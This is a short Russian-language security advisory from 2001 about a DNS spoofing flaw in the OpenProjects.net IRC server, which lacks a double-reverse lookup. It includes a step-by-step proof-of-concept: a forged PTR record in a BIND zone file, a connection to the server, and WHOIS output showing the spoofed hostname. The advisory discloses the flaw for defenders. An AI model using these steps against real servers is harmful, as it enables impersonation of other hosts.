Security Lab

DNS spoofing для OpenProjects.net ircd

Дата публикации:11.10.2001
Всего просмотров:1294
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание:

 OpenProjects.net ircd уязвим к подмене DNS (DNS spoofing) из-за недостатка двойного-обратного поиска DNS. Это позволяет нападающему подменить любое имя, которое существует в интернет.
Пример:

1. Выберите доменное имя для подмены. К примеру host.example.com.
2. Направьте обратный поиск (Reverse Lookup) на домен. Для нашего примера, мы поместим следующее в наш файл зон BIND:
1.2.3.4.in-addr.arpa. В PTR host.example.com. 1.2.3.4 – IP адрес host.example.com.
3. Соединитесь с уязвимым IRC сервером.
BitchX-H 1.2.3.4 jmutex asimov.openprojects.net
4. Сделайте WHOIS непосредственно на себя.
/whois jmutex
jmutex (jmutex@ host.example.com)
ircname : Jukka Mutex
server : asimov.openprojects.net (Fremont, CA)
idle : 0 hours 0 mins 24 secs (signon: Oct 11 14:48:16 2001)